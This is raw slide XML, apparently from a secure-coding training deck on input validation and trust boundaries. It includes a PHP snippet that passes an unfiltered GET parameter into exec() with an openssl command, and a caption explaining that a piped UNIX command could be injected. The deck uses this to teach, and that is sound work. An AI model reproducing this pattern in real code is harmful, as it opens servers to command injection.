                    <a:pt x="1569821" y="98226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1613845" y="115418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1654869" y="133720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1692734" y="153071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727284" y="173408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1785805" y="216797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1829169" y="263393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1856114" y="312703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1865376" y="364235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1863034" y="390248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1844773" y="440731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809461" y="488746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1758361" y="533800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1692734" y="575400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1654869" y="594751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1613845" y="613053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1569821" y="630245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1522955" y="646265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1473405" y="661053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421327" y="674545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1366881" y="686681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1310224" y="697398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251514" y="706636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190908" y="714333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128565" y="720426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1064642" y="724855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999297" y="727557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932688" y="728471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866078" y="727557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800733" y="724855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736810" y="720426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674467" y="714333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613861" y="706636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555151" y="697398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498494" y="686681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444048" y="674545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391970" y="661053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342420" y="646265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295554" y="630245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251530" y="613053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210506" y="594751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172641" y="575400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138091" y="555063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79570" y="511674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36206" y="465078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9261" y="415768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="364235"/>
                  </a:lnTo>
                  <a:close/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800086" y="2076802"/>
            <a:ext cx="2496170" cy="2114643"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28955">
            <a:solidFill>
              <a:srgbClr val="006FC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defTabSz="914126"/>
            <a:endParaRPr sz="1799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914126">
              <a:spcBef>
                <a:spcPts val="30"/>
              </a:spcBef>
            </a:pP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R="5713" algn="ctr" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pP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Application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  <a:p>
            <a:pPr defTabSz="914126"/>
            <a:endParaRPr sz="1799">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126"/>
            <a:endParaRPr sz="1799">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="1550">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="943327" marR="948405" indent="1270" algn="ctr" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pP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Email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Se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r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v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er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00081" y="4580970"/>
            <a:ext cx="1437900" cy="29964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1799" spc="-30" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-6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Boundary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954214" y="3058763"/>
            <a:ext cx="234889" cy="495171"/>
            <a:chOff x="8956547" y="3058667"/>
            <a:chExt cx="234950" cy="495300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8962643" y="3064763"/>
              <a:ext cx="222885" cy="483234"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="222884" h="483235">
                  <a:moveTo>
                    <a:pt x="111252" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="111251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55626" y="111251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55626" y="371855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="371855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111252" y="483107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222504" y="371855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166878" y="371855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166878" y="111251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222504" y="111251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11125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8962643" y="3064763"/>
              <a:ext cx="222885" cy="483234"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="222884" h="483235">
                  <a:moveTo>
                    <a:pt x="0" y="111251"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="111252" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222504" y="111251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166878" y="111251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166878" y="371855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222504" y="371855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111252" y="483107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="371855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55626" y="371855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55626" y="111251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="111251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128</a:t>
            </a:fld>
            <a:endParaRPr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6286518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20" dirty="0"/>
              <a:t>Validate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10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892729" y="1140484"/>
            <a:ext cx="752914" cy="391058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84730" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="10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46157" y="1501641"/>
            <a:ext cx="8499166" cy="3867413"/>
            <a:chOff x="946404" y="1501139"/>
            <a:chExt cx="8501380" cy="38684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6404" y="1511807"/>
              <a:ext cx="8500871" cy="38572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9219" y="1501139"/>
              <a:ext cx="6873240" cy="224028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78407" y="1543811"/>
              <a:ext cx="8382000" cy="3738879"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8382000" h="3738879">
                  <a:moveTo>
                    <a:pt x="8382000" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3738372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8382000" y="3738372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8382000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978407" y="1543811"/>
              <a:ext cx="8382000" cy="3738879"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8382000" h="3738879">
                  <a:moveTo>
                    <a:pt x="0" y="3738372"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8382000" y="3738372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8382000" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3738372"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="12192">
              <a:solidFill>
                <a:srgbClr val="DEEBF7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27285" y="1565126"/>
            <a:ext cx="2983088" cy="1488052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defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>if(!isset($cert))</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="7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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>$cert=$_GET['cert'];</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126"/>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126"/>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126"/>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>x509_open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>($cert</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-10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1600" b="1" spc="5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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="368824" defTabSz="914126"/>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>global</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>$cert_in_dir,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>$openssl;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="368824" defTabSz="914126"/>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>$lines</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-2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r>
              <a:rPr sz="1600" b="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> array();</a:t>
            </a:r>
            <a:endParaRPr sz="16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129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871798" y="1453584"/>
            <a:ext cx="4145470" cy="1603592"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="123793" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="975"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>// $cert</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>contains</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>unfiltered</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>data.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1176302" marR="5078" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="990"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1799" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>Here</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="-10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1799" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="-10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1799" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>$cert</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="10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1799" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>variable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="20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1799" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="10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1799" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="5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1799" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>crafted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="5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1799" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="-10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1799" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>contain</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="5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1799" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="-10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1799" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>piped </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>UNIX </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="5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1799" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>command </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>which will </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>executed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="-400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1799" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="-15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1799" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="-5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1799" b="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>serv</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>er.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Arial Narrow"/>
              <a:cs typeface="Arial Narro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96250" y="3028037"/>
            <a:ext cx="7073328" cy="1827054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defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="4951514" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>exec("$openssl</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>x509</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="4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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>-in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>$cert_in_dir</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>$cert</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="8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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>-subject</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="2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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>-issuer	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>-dates</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3313706" defTabSz="914126"/>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>-serial</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-3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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>-fingerprint</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="2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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>-noout</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126"/>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="25"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="1550">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4151654" marR="5078" defTabSz="914126"/>
            <a:r>
              <a:rPr sz="1799" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="-10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1799" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>solution</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="10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1799" b="1" dirty="0">
                <a:solidFill>
